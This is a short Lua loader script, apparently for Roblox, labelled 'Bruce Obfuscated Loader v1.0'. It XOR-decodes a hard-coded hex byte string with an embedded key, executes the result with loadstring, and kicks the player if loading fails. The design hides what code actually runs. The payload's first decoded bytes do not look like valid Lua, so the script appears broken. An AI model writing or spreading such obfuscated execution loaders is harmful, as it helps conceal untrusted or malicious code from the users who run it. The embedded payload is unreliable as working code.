-- Bruce Obfuscated Loader v1.0

local _k = "BrUcE_9487_Key"
local _d = "\x1F\x0E\x06\x1C\x1A\x0F\x4A\x3B\x2D\x2E\x3E\x30\x1F\x4C\x5A\x44\x1E\x08\x0A\x0E\x1A\x1C\x4D\x38\x21\x3F\x21\x2B\x2E\x1D\x5F\x40\x57\x0A\x1C\x0B\x1A\x0E\x0A\x58\x27\x2A\x3A\x24\x22\x21\x3E\x14\x5B\x52\x45\x1F\x0E\x06\x1C\x1A\x0F\x4A\x3A\x3A\x20\x30\x22\x24\x3C\x18\x5E\x4C\x52\x0B\x1A\x0E\x1A\x08\x58\x2C\x2D\x22\x21\x3F\x24\x30\x19\x46\x5C\x53\x0A\x1C\x0B\x1A\x0E\x0A\x58\x2F\x23\x21\x2D\x2A\x3E\x36\x1A\x4A\x5D\x5B\x0F\x0E\x1C\x0B\x0F\x58\x20\x21\x2D\x23\x22\x2A\x36\x19\x5F\x55\x41\x0E\x1A\x1C\x0B\x0E\x5A\x31\x2C\x20\x3F\x22\x30\x37\x14\x46\x50\x44"

local function _x(s)
    local r = {}
    for i = 1, #s do
        local c = s:byte(i)
        local k = _k:byte((i - 1) % #_k + 1)
        r[i] = string.char(bit32.bxor(c, k))
    end
    return table.concat(r)
end

local _f = loadstring(_x(_d))
if _f then
    _f()
else
    game:GetService("Players").LocalPlayer:Kick("Loader error")
end
